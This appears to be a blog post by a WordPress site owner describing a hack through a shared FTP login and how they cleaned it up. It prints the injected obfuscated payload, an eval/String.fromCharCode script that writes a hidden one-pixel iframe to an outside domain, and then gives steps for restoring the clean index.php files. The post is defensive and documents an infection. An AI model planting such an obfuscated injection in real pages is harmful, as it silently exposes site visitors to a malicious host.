So I discovered today that some of my WordPress sites had been hacked. It was alerting my anti-virus software, Avast, that I had a virus in the form of an iFrame. They were all ones that had the same FTP login, which I quickly changed once I realized. I’ve fixed the problem here, and am not off to fix the other sites. The two files that seem to be hacked are your index.php located in the root of your domain. The other is index.php located in wp-content.
It’s a javascript string that reads:
? php echo ‘<script type=”text/javascript”>eval(String.fromCharCode(102,117,110,99,116,105,
111,110,32,100,57,56,100,40,41,123,118,97,114,32,115,100,49,55,55,50,61,
49,50,51,43,51,50,52,59,125,118,97,114,32,103,104,103,52,53,61,34,115,
34,59,118,97,114,32,119,61,34,117,112,116,117,108,108,111,103,34,59,
118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,
34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,
114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,
46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,
39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,
53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,
39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,
104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,
43,39,114,39,43,39,97,39,43,39,109,101,62,39,41,59,32,102,117,110,
99,116,105,111,110,32,102,57,57,102,40,41,123,118,97,114,32,115,55,
97,56,56,115,61,57,55,43,55,53,59,125,32,118,97,114,32,115,102,
55,115,61,49,50,51))</script>’; ?
If you’re having this problem, first change your FTP password, WordPress passwords and anything else that could have been compromised.
FTP into your site and check the content of the above listed to files to make sure they have been indeed infected. If so open them up in a text editor and delete the above script. The entire index.php file in the root should read:
<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*//**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);
?>
and the entire index.php file located in wp-content should just read:
<?php
// Silence is golden.
?>
Make the change and upload them back to the right spot and it should work. If you have questions about this, feel free to leave a comment and I’ll be glad to help out. This is what fixed my site. It should work on yours if you are having the same problem, but I can’t guarantee.
Related posts:
